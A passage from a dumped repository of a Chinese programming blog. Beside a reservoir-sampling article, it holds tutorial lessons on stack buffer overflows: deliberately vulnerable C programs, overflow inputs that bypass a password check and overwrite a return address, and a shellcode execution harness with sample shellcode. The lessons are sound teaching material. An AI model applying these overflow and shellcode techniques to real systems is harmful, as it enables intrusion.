├── README.md ├── algorithm-reservoir-algorithm.md ├── bug-hunter-stackoverflow.md ├── bug-hunter-stackoverflow2.md ├── bug-hunter-stackoverflow3.md ├── bug-hunter-stackoverflow4.md ├── c++-template-singleton.md ├── c-hello-world.md ├── decrease-resident-memory.md ├── how-to-write-a-self-repair-tcp-pool.md ├── how-to-write-a-tcp-server.md ├── image ├── active_object │ ├── .keep │ ├── active_object_design.png │ └── result.png ├── c-hello-world │ ├── .gitkeep │ ├── Register386.png │ ├── a.out-symbol.png │ ├── exit-instruction.png │ ├── instruction.png │ ├── main.png │ ├── memory-model.png │ ├── reverse-a.out.png │ ├── reverse-test.png │ └── test.asm.png ├── machine-learning │ ├── backpropagation.png │ ├── big_learning_rate.png │ ├── cost.JPG │ ├── cost_pic01.png │ ├── cost_pic02.png │ ├── covariance.png │ ├── entropy.png │ ├── euclidean_distance.png │ ├── example_gradient.png │ ├── function.png │ ├── gini_impurity.png │ ├── gradient.png │ ├── gradient_descent.JPG │ ├── hidden-layer-30.png │ ├── hx.png │ ├── k-means.png │ ├── linear-regression-form.png │ ├── linear_example.JPG │ ├── logistic_regression_cost.png │ ├── logistic_regression_cost_gradient.png │ ├── mse.png │ ├── pearson_correlation.png │ ├── regular_logistic_regression_cost.png │ ├── regular_logistic_regression_cost_gradient.png │ ├── sigmoid_function.png │ ├── standard_deviation.png │ ├── train.png │ ├── train2.png │ └── word_vector.png ├── memory_management │ ├── .keep │ ├── heapAllocation.png │ ├── heapMapped.png │ ├── kernelUserMemorySplit.png │ ├── linuxClassicAddressSpaceLayout.png │ ├── linuxFlexibleAddressSpaceLayout.png │ ├── malloc_chunk.png │ ├── mappingBinaryImage.png │ ├── memoryDescriptorAndMemoryAreas.png │ ├── mm_struct.png │ ├── pagedVirtualSpace.png │ ├── virtualMemoryInProcessSwitch.png │ └── x86PageTableEntry4KB.png ├── peterson_lock │ ├── .keep │ └── peterson_gdb.png ├── pthreads │ ├── .keep │ ├── NUMA.png │ ├── UMA.png │ ├── cpu_cache.png │ └── multi_processor.png ├── stackoverflow │ ├── .keep │ ├── getenv.png │ ├── main_assembly.png │ ├── ret_addr.png │ └── variable_distance.png └── syn-flood │ ├── .gitkeep │ ├── backlog.png │ ├── half-connection.png │ ├── ip_header.png │ ├── ip_packat_sample.png │ ├── syn-packet.png │ └── tcp_header.png ├── machine-learning-decision-trees.md ├── machine-learning-euclidean-distance.md ├── machine-learning-k-means.md ├── machine-learning-linear-regression-calculation.md ├── machine-learning-linear-regression.md ├── machine-learning-logistic-regression.md ├── machine-learning-neural-networks-digit-recognition.md ├── machine-learning-pearson-correlation.md ├── machine-learning-search-and-rank.md ├── machine-learning-stochastic-gradient-descent.md ├── machine-learning-word-vector.md ├── memory-management.md ├── parallel-programming-active_object_design_pattern.md ├── parallel-programming-peterson_lock_report.md ├── parallel-programming-pthreads1.md ├── parallel-programming-pthreads2.md ├── syn-flood.md ├── system-monitor.md └── you-really-know-how-to-write-singleton.md /README.md: -------------------------------------------------------------------------------- 1 | Welcome To Charles's Awsome Blog 2 | ================================ 3 | 4 | - [Home](https://github.com/linghuazaii/blog/wiki) 5 | - [Memory management every engineer needs to know](https://github.com/linghuazaii/blog/wiki/Memory-management-every-engineer-needs-to-know) 6 | - [SYN-Flood简易实现和原理解析](https://github.com/linghuazaii/blog/wiki/SYN-Flood%E7%AE%80%E6%98%93%E5%AE%9E%E7%8E%B0%E5%92%8C%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90) 7 | - [Server-Benchmarking](https://github.com/linghuazaii/blog/wiki/Server-Benchmarking) 8 | - [[新手乐园]和我一起学C - Hello World](https://github.com/linghuazaii/blog/wiki/%5B新手乐园%5D和我一起学C---Hello-World) 9 | - [Simple C++ Template Singleton Class](https://github.com/linghuazaii/blog/wiki/Simple-C---Template-Singleton-Class) 10 | - [[Bug Hunter]关于stack overflow Lesson I](https://github.com/linghuazaii/blog/wiki/%5BBug-Hunter%5D关于stack-overflow-Lesson-I) 11 | - [[Bug Hunter]关于stack overflow Lesson II](https://github.com/linghuazaii/blog/wiki/%5BBug-Hunter%5D%E5%85%B3%E4%BA%8Estack-overflow-Lesson-II) 12 | - [[Bug Hunter]浅说shellcode](https://github.com/linghuazaii/blog/wiki/%5BBug-Hunter%5D%E6%B5%85%E8%AF%B4shellcode) 13 | - [[Parallel Programming]Peterson Lock 研究报告](https://github.com/linghuazaii/blog/wiki/%5BParallel-Programming%5DPeterson-Lock-%E7%A0%94%E7%A9%B6%E6%8A%A5%E5%91%8A) 14 | - [[Parallel Programming]Active Object Design Pattern](https://github.com/linghuazaii/blog/wiki/%5BParallel-Programming%5DActive-Object-Design-Pattern) 15 | - [[Bug Hunter]关于stack overflow Lesson III](https://github.com/linghuazaii/blog/wiki/%5BBug-Hunter%5D%E5%85%B3%E4%BA%8Estack-overflow-Lesson-III) 16 | - [[Parallel Programming]深入PThread (Lesson I)](https://github.com/linghuazaii/blog/wiki/%5BParallel-Programming%5D%E6%B7%B1%E5%85%A5PThread-(Lesson-I)) 17 | - [[Parallel Programming]深入PThread (Lesson II)](https://github.com/linghuazaii/blog/wiki/%5BParallel-Programming%5D%E6%B7%B1%E5%85%A5PThread-(Lesson-II)) 18 | - [[Machine Learning]Euclidean Distance](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DEuclidean-Distance) 19 | - [[Machine Learning]Pearson Correlation](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DPearson-Correlation) 20 | - [[Algorithm]百度:蓄水池抽样](https://github.com/linghuazaii/blog/wiki/%5BAlgorithm%5D%E7%99%BE%E5%BA%A6%EF%BC%9A%E8%93%84%E6%B0%B4%E6%B1%A0%E6%8A%BD%E6%A0%B7) 21 | - [[Machine Learning]Word Vector](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DWord-Vector) 22 | - [[Machine Learning]K-Means](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DK-Means) 23 | - [[Machine Learning]Search And Rank](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DSearch-And-Rank) 24 | - [[Machine Learning]Decision Trees](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DDecision-Trees) 25 | - [怎么从无到有写一个好的TCP Server](https://github.com/linghuazaii/blog/wiki/%E6%80%8E%E4%B9%88%E4%BB%8E%E6%97%A0%E5%88%B0%E6%9C%89%E5%86%99%E4%B8%80%E4%B8%AA%E5%A5%BD%E7%9A%84TCP-Server) 26 | - [怎样写一个自修复的TCP连接池](https://github.com/linghuazaii/blog/wiki/%E6%80%8E%E6%A0%B7%E5%86%99%E4%B8%80%E4%B8%AA%E8%87%AA%E4%BF%AE%E5%A4%8D%E7%9A%84TCP%E8%BF%9E%E6%8E%A5%E6%B1%A0) 27 | - [你真的知道怎么写Singleton吗?](https://github.com/linghuazaii/blog/wiki/%E4%BD%A0%E7%9C%9F%E7%9A%84%E7%9F%A5%E9%81%93%E6%80%8E%E4%B9%88%E5%86%99Singleton%E5%90%97%EF%BC%9F) 28 | - [Linear Regression(线性回归)](https://github.com/linghuazaii/blog/wiki/Linear-Regression(%E7%BA%BF%E6%80%A7%E5%9B%9E%E5%BD%92)) 29 | - [Linear Regression矩阵计算](https://github.com/linghuazaii/blog/wiki/Linear-Regression%E7%9F%A9%E9%98%B5%E8%AE%A1%E7%AE%97) 30 | - [Andrew NG. Logistic Regression小结与示例](https://github.com/linghuazaii/blog/wiki/Andrew-NG.-Logistic-Regression%E5%B0%8F%E7%BB%93%E4%B8%8E%E7%A4%BA%E4%BE%8B) 31 | - [Stochastic Gradient Descent](https://github.com/linghuazaii/blog/wiki/Stochastic-Gradient-Descent) 32 | - [Neural Networks Backpropagation做MNIST数字识别](https://github.com/linghuazaii/blog/wiki/Neural-Networks-Backpropagation%E5%81%9AMNIST%E6%95%B0%E5%AD%97%E8%AF%86%E5%88%AB) 33 | -------------------------------------------------------------------------------- /algorithm-reservoir-algorithm.md: -------------------------------------------------------------------------------- 1 | [Algorithm]百度:蓄水池抽样 2 | =========================== 3 | 4 | ### 前言 5 |   曾经面百度被问到过这个问题,对于蓄水池抽样可以有一万种问法,但是万变不离其宗。给一个大小未知的数据,数据的体量统计起来比较耗时,例如我要统计100T的日志文件里有多少条日志。然后要求你随机K条数据,保证每条数据被抽取到的概率都相等。 6 | 7 | ### Probability and Statistics 8 |   先考虑这么一个问题:给定**N**个数,从中选取**K**个数,第**i**个数被取到的概率是多少? 9 |   从**N**个数里选取**K**个数的样本大小为 `Cr(N, K) = Pr(N, K) / K! = N! / ((N - K)! * K!)`。 10 |   如果第**i**个数已经选定,那么从**N - 1**个数里选取**K - 1**个数的样本大小为 `Cr(N - 1, K - 1) = Pr(N - 1, K - 1) / (K - 1)! = (N - 1)! / ((N - 1 - (K - 1))! * (K - 1)!) = (N - 1)! / ((N - K)! * (K - 1)!)`。 11 |   那么第**i**个数被选到的概率为 `p(i) = Cr(N - 1, K - 1) / Cr(N, K) = K / N`。 12 | 13 | ### 随机选取一条数据 14 |   先思考简单一点的问题,从大小未知的**N**个数据里随机选取一个数,如果确保每个数被选中的概率都为`1/N`? 15 | 1. 选取第一个数 16 | 2. 后面第**i**个数被保留的概率为**1/i** 17 | 3. 后面第**i**个数被丢弃的概率为**(i - 1)/i** 18 | 19 |   那么第一个数最终被保留的概率为`p(1) = 1/2 * 2/3 * 3/4 * ... * (N - 1)/N = 1/N`。 20 |   第**i**个数最终被保留的概率为**i**被选取,后面全部丢弃的概率,即`p(i) = 1/i * i/(1+i) * (i+1)/(i+2) * ... * (N-1)/N = 1/N`。 21 |   按照以上步骤选取,不需要知道**N**的大小,遍历一次即可取得随机的值,并且所有数被选取的概率均为**1/N**。 22 | 23 | ### 随机选取K条数据 24 |   为了保证所有的数据被选取的概率都为**K/N**,可以这么想一下,最后一个数被保留的概率必然为**K/N**,那么第**i**个数被保留的概率为**K/i**。 25 | 1. 选取前K个数,取**i > K** 26 | 2. 第**i**个数被保留的概率为**K/i**,这里的保留不表示最终会选取 27 | 3. 第**i**个数被丢弃的概率为**(i-K)/i** 28 | 4. 第**m(m > i)**个数不替换第**i**个数的概率为`(m-k)/m + k/m * (k-1)/k = (m-1)/m`,意为第**m**个数被丢弃的概率加上第**m**个数被保留但是不替换第**i**个数的概率 29 | 30 |   那么第**i**个数被最终选取的概率为`p(i) = K/i * i/(i+1) * (i+1)/(i+2) * ... * (N-1)/N = K/N`。 31 |   前**K**个数里第**k**个数被保留的概率为`p(k) = K/(K+1) * (K+1)/(K+2) * ... * (N-1)/N = K/N`,意为后面的数都不会替换第**k**个数。 32 | 33 | ### 伪代码和例子 34 | **伪代码** 35 | ```c 36 | /* 37 | S has items to sample, R will contain the result 38 | */ 39 | ReservoirSample(S[1..n], R[1..k]) 40 | // fill the reservoir array 41 | for i = 1 to k 42 | R[i] := S[i] 43 | 44 | // replace elements with gradually decreasing probability 45 | for i = k+1 to n 46 | j := random(1, i) // important: inclusive range 47 | if j <= k 48 | R[j] := S[i] 49 | ``` 50 | 51 | [测试代码](https://github.com/linghuazaii/algorithm_testing/blob/master/reservoir.cpp) 52 | **测试结果** 53 | ``` 54 | =========== data =========== 55 | 92 51 11 69 24 35 17 36 26 98 67 39 83 2 75 56 59 18 32 40 91 86 57 12 14 42 27 62 63 58 30 96 13 68 3 87 71 64 9 22 66 80 20 79 89 81 73 0 94 41 88 28 52 43 16 60 49 7 84 72 29 61 6 45 53 76 8 33 37 15 25 55 70 31 82 47 48 10 90 34 23 74 77 19 85 44 93 54 97 1 38 95 4 21 99 5 78 65 50 46 56 | ============================================ 57 | =========== random k =========== 58 | 77 79 4 97 95 42 59 | ============================================ 60 | 61 | =========== data =========== 62 | 92 51 11 69 24 35 17 36 26 98 67 39 83 2 75 56 59 18 32 40 91 86 57 12 14 42 27 62 63 58 30 96 13 68 3 87 71 64 9 22 66 80 20 79 89 81 73 0 94 41 88 28 52 43 16 60 49 7 84 72 29 61 6 45 53 76 8 33 37 15 25 55 70 31 82 47 48 10 90 34 23 74 77 19 85 44 93 54 97 1 38 95 4 21 99 5 78 65 50 46 63 | ============================================ 64 | =========== random k =========== 65 | 60 65 80 86 50 59 66 | ============================================ 67 | 68 | =========== data =========== 69 | 92 51 11 69 24 35 17 36 26 98 67 39 83 2 75 56 59 18 32 40 91 86 57 12 14 42 27 62 63 58 30 96 13 68 3 87 71 64 9 22 66 80 20 79 89 81 73 0 94 41 88 28 52 43 16 60 49 7 84 72 29 61 6 45 53 76 8 33 37 15 25 55 70 31 82 47 48 10 90 34 23 74 77 19 85 44 93 54 97 1 38 95 4 21 99 5 78 65 50 46 70 | ============================================ 71 | =========== random k =========== 72 | 92 9 28 65 19 75 73 | ============================================ 74 | ``` 75 | 76 | ### Reference 77 | - [Reservoir sampling](https://en.wikipedia.org/wiki/Reservoir_sampling) 78 | 79 | ### 小结 80 |   **GOOD LUCK, HAVE FUN!** 81 | -------------------------------------------------------------------------------- /bug-hunter-stackoverflow.md: -------------------------------------------------------------------------------- 1 | [Bug Hunter]关于stack overflow Lesson I 2 | ======================================= 3 | 4 | ### 前言 5 |   无论是你还是我,或者其他所谓的资深或者专家,都或多或少一个不小心就写出了烂代码,留下了价值几十万、几百万、甚至几千万的大坑!下文是第一节课,作为新手的我和大家一起分享,一起学习。 6 |   或许你觉得自己对于Stack已经很了解了,但是我还是得唠叨一句。Stack是一个LIFO是众所周知的,大家不知道的可能是我们日常函数调用或者局部变量使用栈的一些细节。在这里我只是简单的提一下。 7 | 8 | ### 关于Stack 9 |   你可以简单的写一个C程序,程序里仅仅需要有一个函数的定义,然后在`main`里调用它即可,编译的时候加上`-g`。然后`gdb -tui `,然后`set disassembly intel`设置成intel指令格式,看个人习惯吧,大部分人都习惯intel指令格式,AT&T看着有些别扭,让人不习惯。然后`layout asm`查看汇编代码,`break main`或者`break *_start`,`ni`逐步往下走。你会发现Stack的用法就是这样的:没进入一个函数,都会把当前的ESP保存到EBP,然后ESP指向当前的函数栈,这个操作叫做ENTER。然后局部变量一个个压栈,完了ret之前调用leave,就是ENTER的逆操作,在进入`main`之前,EBP的值是0x0,就是栈底啦。这个小知识虽然与本文关系不是那么大,但是万丈高楼平地起,知道的原理越接近本质,事物对于你来说就呈现出来的越简单。就好比现在的所谓高级,资深动不动扯开源框架啊什么的,作为初级的我不太喜欢这些太浮于表面到东西,要想自己写一个好轮子,必须从底层到本质开始建楼。所以我从最底层的parallel programming开始,因为更接近事物的本质,从冯·诺伊曼模型开始,怎么由SISD到SIMD再到MIMD,怎么由UMA到NUMA,为了解决什么问题,怎么解决,这些都是最本质到问题。下面回到正题! 10 | 11 | ### 例子源码 12 | ```c 13 | #include 14 | #include 15 | 16 | int main(int argc, char *argv[]) { 17 | int value = 5; 18 | char buffer_one[8], buffer_two[8]; 19 | 20 | strcpy(buffer_one, "one"); /* Put "one" into buffer_one. */ 21 | strcpy(buffer_two, "two"); /* Put "two" into buffer_two. */ 22 | 23 | printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two); 24 | printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one); 25 | printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value); 26 | 27 | printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", strlen(argv[1])); 28 | strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two. */ 29 | 30 | printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two); 31 | printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one); 32 | printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value); 33 | 34 | if (value == 5) 35 | printf("execute as expected!\n"); 36 | else if (value == 1801675112) 37 | printf("hacked, now we can do a little bad things at this branch!!!\n"); 38 | else 39 | printf("execute unexpected, fucked up!\n"); 40 | 41 | return 0; 42 | } 43 | ``` 44 |   如果你够仔细到话,你可能会发现这里用到是`strcpy`而不是`strncpy`,甚至还有这么一句`strcpy(buffer_two, argv[1])`,这样就可以简单的构造一个栈溢出,大型的项目里,这种Bug会藏的很深,不然就不会有那么多0day漏洞了。编译一下,`gcc example.c -o example`。 45 |   运行正常情况`./example 123456`,结果如下: 46 | > [BEFORE] buffer_two is at 0x7fff9fa850a0 and contains 'two' 47 | > [BEFORE] buffer_one is at 0x7fff9fa850b0 and contains 'one' 48 | > [BEFORE] value is at 0x7fff9fa850bc and is 5 (0x00000005) 49 | > 50 | > [STRCPY] copying 6 bytes into buffer_two 51 | > 52 | > [AFTER] buffer_two is at 0x7fff9fa850a0 and contains '123456' 53 | > [AFTER] buffer_one is at 0x7fff9fa850b0 and contains 'one' 54 | > [AFTER] value is at 0x7fff9fa850bc and is 5 (0x00000005) 55 | > execute as expected! 56 | 57 |   关于为什么`buffer_one`和`buffer_tow`的地址间隔是16,而不是8,我没整明白,如果你知道的话,请不吝赐教。从目前得到的信息来看,`buffer_one`比`buffer_one`高出16个字节,而`value`的地址比`buffer_one`高出12个字节而不是4个,这一点我也没整明白,也请不吝赐教。那么我猜想,如果我输入的参数为16个字节的话,按照`strcpy`的规则来讲,`buffer_one`会被覆盖为0x0,再次运行`./example 1234567890123456`,结果如下: 58 | > [BEFORE] buffer_two is at 0x7ffd538796d0 and contains 'two' 59 | > [BEFORE] buffer_one is at 0x7ffd538796e0 and contains 'one' 60 | > [BEFORE] value is at 0x7ffd538796ec and is 5 (0x00000005) 61 | > 62 | > [STRCPY] copying 16 bytes into buffer_two 63 | > 64 | > [AFTER] buffer_two is at 0x7ffd538796d0 and contains '1234567890123456' 65 | > [AFTER] buffer_one is at 0x7ffd538796e0 and contains '' 66 | > [AFTER] value is at 0x7ffd538796ec and is 5 (0x00000005) 67 | > execute as expected! 68 | 69 |   和预想的一样,那么我们就可以控制`buffer_one`的内容了,再次运行`./example 1234567890123456fuckedup`,结果如下: 70 | > [BEFORE] buffer_two is at 0x7ffc299904f0 and contains 'two' 71 | > [BEFORE] buffer_one is at 0x7ffc29990500 and contains 'one' 72 | > [BEFORE] value is at 0x7ffc2999050c and is 5 (0x00000005) 73 | > 74 | > [STRCPY] copying 24 bytes into buffer_two 75 | > 76 | > [AFTER] buffer_two is at 0x7ffc299904f0 and contains '1234567890123456fuckedup' 77 | > [AFTER] buffer_one is at 0x7ffc29990500 and contains 'fuckedup' 78 | > [AFTER] value is at 0x7ffc2999050c and is 5 (0x00000005) 79 | > execute as expected! 80 | 81 |   再次如愿以偿,`buffer_one`的内容变成了`fuckedup`,进而我们可以控制`value`的值,让程序换个分支运行,再次运行`./example '1234567890123456fucked up!!!1'`,结果如下: 82 | > [BEFORE] buffer_two is at 0x7fff596de720 and contains 'two' 83 | > [BEFORE] buffer_one is at 0x7fff596de730 and contains 'one' 84 | > [BEFORE] value is at 0x7fff596de73c and is 5 (0x00000005) 85 | > 86 | > [STRCPY] copying 29 bytes into buffer_two 87 | > 88 | > [AFTER] buffer_two is at 0x7fff596de720 and contains '1234567890123456fucked up!!!1' 89 | > [AFTER] buffer_one is at 0x7fff596de730 and contains 'fucked up!!!1' 90 | > [AFTER] value is at 0x7fff596de73c and is 49 (0x00000031) 91 | > execute unexpected, fucked up! 92 | 93 |   请打开ASCII码表查看1的ASCII码值,十进制和十六进制。是不是一切尽在掌握呢,当然,这个权限还是太小,随着以后的分享,我们一步步深入了解。 94 | 95 | ### 留给读者的问题 96 |   还有一个分支是我留给广大的读者朋友的,哈哈,构造怎样的输入才能执行第二个分支呢?请将你的答案在此项目上open一个issue,注明[Bug Hunter Lesson I] + 你的答案,第一位给出正确答案的读者,博主将发一个10块钱的微信红包作为奖励^_^!博主很穷,挣的非常少,还请谅解TAT 97 | 98 | ### 结语 99 |   没点关注的点一波关注,谢谢!Have Fun!See You! 100 | -------------------------------------------------------------------------------- /bug-hunter-stackoverflow2.md: -------------------------------------------------------------------------------- 1 | [Bug Hunter]关于stack overflow Lesson II 2 | ======================================= 3 | 4 | ### 回顾 5 |   上一篇我们已经简单了解了stackoverflow的简单原理,以及怎么利用stackoverflow去控制程序的逻辑,本节Lesson更加深入的探讨一下stackoverflow的进一步利用点。这一个系列是根据博主本人的学习进度写成,所以速度可能偏慢,因为我也有活要干,同时我也是个新手。 6 | 7 | 8 | ### 例子一 9 | ```c 10 | #include 11 | #include 12 | #include 13 | 14 | int check_authentication(char *password) { 15 | int auth_flag = 0; 16 | char password_buffer[16]; 17 | 18 | strcpy(password_buffer, password); 19 | 20 | if(strcmp(password_buffer, "brillig") == 0) 21 | auth_flag = 1; 22 | if(strcmp(password_buffer, "outgrabe") == 0) 23 | auth_flag = 1; 24 | 25 | return auth_flag; 26 | } 27 | 28 | int main(int argc, char *argv[]) { 29 | if(argc < 2) { 30 | printf("Usage: %s \n", argv[0]); 31 | exit(0); 32 | } 33 | if(check_authentication(argv[1])) { 34 | printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 35 | printf(" Access Granted.\n"); 36 | printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 37 | } else { 38 | printf("\nAccess Denied.\n"); 39 | } 40 | } 41 | ``` 42 | 43 |   本例是一个简单的认证判断,如果输入参数是`brillig`或者`outgrabe`,那么输出`Access Granted.`。显然这里也有一个stackoverflow的bug,在`strcpy`函数这里。在Stack上,`auth_flag`先入栈,`password_buffer`后入栈,所以`auth_flag`的地址比`password_buffer`高,这样就可以覆盖`auth_flag`的值。`gcc example.c -o example -g`,生成可执行程序。然后`gdb -tui example`获取一些必要的信息如下。 44 |
45 | 46 | 47 |   算得两地址之差为28,所以我们只需要复写完这28个字节再多复写4个字节就可以了。先看正常情况,`./example $(perl -e "print 'A' x 28")`,结果如下: 48 | 49 | > Access Denied. 50 | 51 |   再看看复写stack情况,`./example $(perl -e "print 'A' x 32")`,结果如下: 52 | 53 | > -=-=-=-=-=-=-=-=-=-=-=-=-=- 54 | > Access Granted. 55 | > -=-=-=-=-=-=-=-=-=-=-=-=-=- 56 | > Segmentation fault 57 | 58 |   虽然栈被写坏了,但是目的达成。 59 | 60 | ### 例子二 61 | ```c 62 | #include 63 | #include 64 | #include 65 | 66 | int check_authentication(char *password) { 67 | char password_buffer[16]; 68 | int auth_flag = 0; 69 | 70 | strcpy(password_buffer, password); 71 | 72 | if(strcmp(password_buffer, "brillig") == 0) 73 | auth_flag = 1; 74 | if(strcmp(password_buffer, "outgrabe") == 0) 75 | auth_flag = 1; 76 | 77 | return auth_flag; 78 | } 79 | 80 | int main(int argc, char *argv[]) { 81 | if(argc < 2) { 82 | printf("Usage: %s \n", argv[0]); 83 | exit(0); 84 | } 85 | if(check_authentication(argv[1])) { 86 | printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 87 | printf(" Access Granted.\n"); 88 | printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 89 | } else { 90 | printf("\nAccess Denied.\n"); 91 | } 92 | } 93 | ``` 94 |   与例子一的唯一差别就是调换了`password_buffer`和`auth_flag`的位置,那么`auth_flag`的地址比`password_buffer`要低,这样就没法复写了,那么我们该怎么办呢? 95 |   还记得Lesson I里我讲到的Stack的本质原理吗?一个函数调用的时候先是压栈,后`leave`弹栈,然后再`ret`返回,栈上其实保存着函数返回时的地址,这是地址会压入EIP/RIP,让我们直接`gdb`看一下就明白了。先`gcc example2.c -o example2 -g`,然后`gdb -tui example2 -q`。 96 | 97 |
98 |   这里我们先注意一下`call 0x40063d `之后会执行一个判断,就是调用`check_authentication`返回值的判断,我们跳过这个判断,直接执行`0x4006ef`的指令就可以输出`Access Granted`。那现在我们看看栈上保存的返回地址是多少,如下: 99 | 100 |
101 |   返回地址是`0x4006eb`,也就是调用call之后的下一条指令,我们直接复写返回地址为`0x4006ef`,由于我用的是x86-64的机器,所以是little endian,所以地址得倒着写,执行`./example2 $(perl -e "print '\ef\06\40\00' x 3)`,结果如下: 102 | 103 | > -=-=-=-=-=-=-=-=-=-=-=-=-=- 104 | > Access Granted. 105 | > -=-=-=-=-=-=-=-=-=-=-=-=-=- 106 | > Segmentation fault 107 | 108 | 109 | ### 结语 110 |   本节提到的一点就是复写函数的返回地址,比复写变量的值更具有杀伤力,是不是呢? 111 |   没点关注的点一波关注,谢谢!Have Fun!See You! 112 | -------------------------------------------------------------------------------- /bug-hunter-stackoverflow3.md: -------------------------------------------------------------------------------- 1 | [Bug Hunter]浅说shellcode 2 | ======================================== 3 | 4 | ### 回顾 5 |   上一篇我们进一步了解了stackoverflow Bug的利用点,就是通过复写函数返回地址的方式来控制程序的逻辑,本篇对shellcode进行一个简单的介绍。虽然本篇暂时和上连篇没有联系,但是我会在Lesson IV里将shellcode和stackoverflow的Bug结合起来。 6 | 7 | ### 关于shellcode 8 |   何为shellcode呢,shellcode就是一段可执行的二进制代码,可执行程序的代码段是只读的,即`.text`段是只读的,那么在我们无法更改程序`.text`段的情况下怎么执行我们自己的代码呢,那就是我们前两篇一直提到的Stack,但是本篇例子放shellcode的地方并不在Stack上,而是在`.data`段,因为`const char code[]`是一个全局已经初始化的变量,但是无关本篇的结论,你愿意的话可以把它放到`main`里去,并不影响结果。 9 | 10 | ### shellcode测试模板 11 | ```c++ 12 | /*shellcodetest.c*/ 13 | const char code[] = "bytecode will go here!"; 14 | int main(int argc, char **argv) 15 | { 16 | int (*func)(); 17 | func = (int (*)()) code; 18 | (int)(*func)(); 19 | } 20 | ``` 21 |   这段代码比较简单,稍微解释一下吧,函数名在汇编这一层也就是一个label,一个具体地址的替代而已,程序的执行就是顺着地址走的,地址里存的就是具体的cpu指令,而我们的shellcode就是cpu指令,下面我会show给你看的。所以这个例子就是讲code地址转换为函数指针,然后执行函数,就是执行我们的shellcode。原理清楚了,我们试着跑一下这个测试模板,可想而知,`code`的数据并不是cpu指令,所以会引发segment fault。你可以编译运行一下以上的代码段,结果如下: 22 | > Segmentation fault 23 | 24 | ### 测试一个可用的shellcode 25 | ```asm 26 | ; exit.asm 27 | [SECTION .text] 28 | global _start 29 | _start: 30 | xor eax, eax 31 | mov al, 1 32 | mov ebx, 10 33 | int 0x80 34 | ``` 35 |   这段汇编的作用就是调用了系统调用`sys_exit(10)`,这里有x86的系统调用列表,[Linux System Call Table](https://www.informatik.htw-dresden.de/~beck/ASM/syscall_list.html)。先生成shellcode,`nasm -f elf exit.asm`,然后`ld exit.o -o exiter -melf_i386`,然后`objdump -d exiter >log`,这里是log文件的内容: 36 | > exiter: file format elf32-i386 37 | > Disassembly of section .text: 38 | > 08048060 <_start>: 39 | > 8048060: 31 c0 xor %eax,%eax 40 | > 8048062: b0 01 mov $0x1,%al 41 | > 8048064: 31 db xor %ebx,%ebx 42 | > 8048066: cd 80 int $0x80 43 | 44 |   那么`\x31\xc0\xb0\x01\x31\xdb\xcd\x80`,就是我们要找的cpu指令,即所谓的shellcode,我们可以直接用工具截取`objdump`内容的shellcode,[odfhex](https://github.com/linghuazaii/hacking-stuff/tree/master/odfhex)。代码也比较简单,当然作者并不是博主。`./odfhex log`,得到结果如下: 45 | > Odfhex - object dump shellcode extractor - by steve hanna - v.01 46 | > Trying to extract the hex of log which is 279 bytes long 47 | > "\x31\xc0\xb0\x01\xbb\x0a\x00\x00\x00\xcd\x80"; 48 | > 11 bytes extracted. 49 | 50 |   用以上shellcode替换`code[]`的内容,编译运行,并没有segment fault,程序正常退出,在shell里`echo $?`获取程序执行的返回码,为10,证明我们的shellcode成功执行了。 51 | 52 | ### 一个简单的hello hacking world的例子 53 | ``` 54 | ;hello.asm 55 | [SECTION .text] 56 | global _start 57 | _start: 58 | jmp short ender 59 | 60 | starter: 61 | xor eax, eax ;clean up the registers 62 | xor ebx, ebx 63 | xor edx, edx 64 | xor ecx, ecx 65 | 66 | mov al, 4 ;syscall write 67 | mov bl, 1 ;stdout is 1 68 | pop ecx ;get the address of the string from the stack 69 | mov dl, 20 ;length of the string 70 | int 0x80 71 | 72 | xor eax, eax 73 | mov al, 1 ;exit the shellcode 74 | xor ebx,ebx 75 | int 0x80 76 | 77 | ender: 78 | call starter ;put the address of the string on the stack 79 | db 'hello hacking world',0x0a 80 | ``` 81 |   简单说下这段汇编代码,程序由`_start`开始执行,定义局部变量,存的是字符串`hello hacking world\n`,`0x0a`就是`\n`,调用`call`会直接将下一条指令压栈,所以跳转到`starter`,清空寄存器,`xor`可以用来快速将寄存器清零,然后调用`sys_write`,然后调用`sys_exit()`。编译`hello.asm`,`nasm -f elf hello.asm`,然后`ld hello.o -o hello -melf_i386`,然后`objdump -d hello >log`,然后`./odfhex log`,结果如下: 82 | > Odfhex - object dump shellcode extractor - by steve hanna - v.01 83 | > Trying to extract the hex of log which is 1265 bytes long 84 | > "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14"\ 85 | > "\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65"\ 86 | > "\x6c\x6c\x6f\x20\x68\x61\x63\x6b\x69\x6e\x67\x20\x77\x6f\x72\x6c\x64"\ 87 | > "\x0a"; 88 | > 52 bytes extracted. 89 | 90 |   将得到的shellcode写到`code[]`数组里面去,编译运行,结果如下: 91 | > hello hacking world 92 | 93 | ### 展望 94 |   以上例子仅仅是为了说明shellcode的基本原理,让我们来展望一下,如果执行我们的shellcode的是一个root user,那么说明什么呢?首先我们可以轻松构造一个shellcode拿到对方机器的shell,然后可以干什么呢?可以干任何事,对方的机器对我们来说就是一个肉鸡啦。下一期我会将shellcode和stackoverflow结合起来,因为shellcode本来自身就是一个非常深的话题,我们这里浅尝辄止,感兴趣可以关注这里的资源[The Shellcoder's 